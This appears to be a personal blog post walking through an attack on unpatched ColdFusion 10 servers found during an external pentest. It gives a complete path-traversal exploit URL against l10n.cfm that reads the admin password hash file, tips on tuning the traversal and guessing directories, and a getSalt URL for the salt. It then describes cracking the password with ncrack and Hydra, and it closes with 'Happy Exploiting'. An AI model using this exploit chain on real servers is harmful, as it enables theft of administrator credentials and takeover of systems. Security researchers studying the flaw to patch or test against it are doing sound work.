ColdFusion had several exploits in the past. ColdFusion 10 being the latest and stable release from Adobe it was hard to find any ready exploits.
As a part of external pentest, I had no information about the infrastructure in use, platform or installed applications. I ran Nessus as first part of network pentest and found that ColdFusion admin login page exists here:
http://XX.XX.XX.XX/CFIDE/administrator/index.cfm
Next step is to get the version number. I got this by social engineering techniques..:)
Interestingly, ColdFusion 10 does not display its version number on the homepage now as compared to other previous versions. You need to assume it or need to get it from other means.
The Exploit
The exploit works if ColdFusion is not updated with latest patches, hotfixes and just has a raw installation. The Remote File Disclosure (RFD) allows accessing the operating system files, configuration files, logs, browsing complete server folders and CF admin password hash.
The vulnerability exists in l10n.cfm module as attribute.file parameter does not have validation for path traversal. This is pretty basic and how can Adobe miss this!!!
Vulnerable URL:
http://XX.XX.XX.XX/CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp&attributes.file=../../administrator/mail/download.cfm&filename=../../../../../../../../../../../../../../coldfusion10/cfusion/lib/password.properties
Notes for successful exploits:
You would need to do couple of ../../ before you get onto the password hash
You would need to guess coldfusion home directory name
You might need to have some knowledge of ColdFusion folder structure. Refer it here.
Post you have access to password hash, next step is to get the Salt so you can perform rainbow table attacks.
Here's a quick reference for you on CF sensitive files. You might want to access them too.
Password Hash URL:
http://XX.XX.XX.XX/CFIDE/adminapi/administrator.cfc?method=getSalt
Having all this information, you may now want to proceed with password cracking. I used ncrack and Hydra for password cracking and it worked pretty quickly as admin password was among the common passwords.
Happy Exploiting CF 10!!!
ليست هناك تعليقات:
إرسال تعليق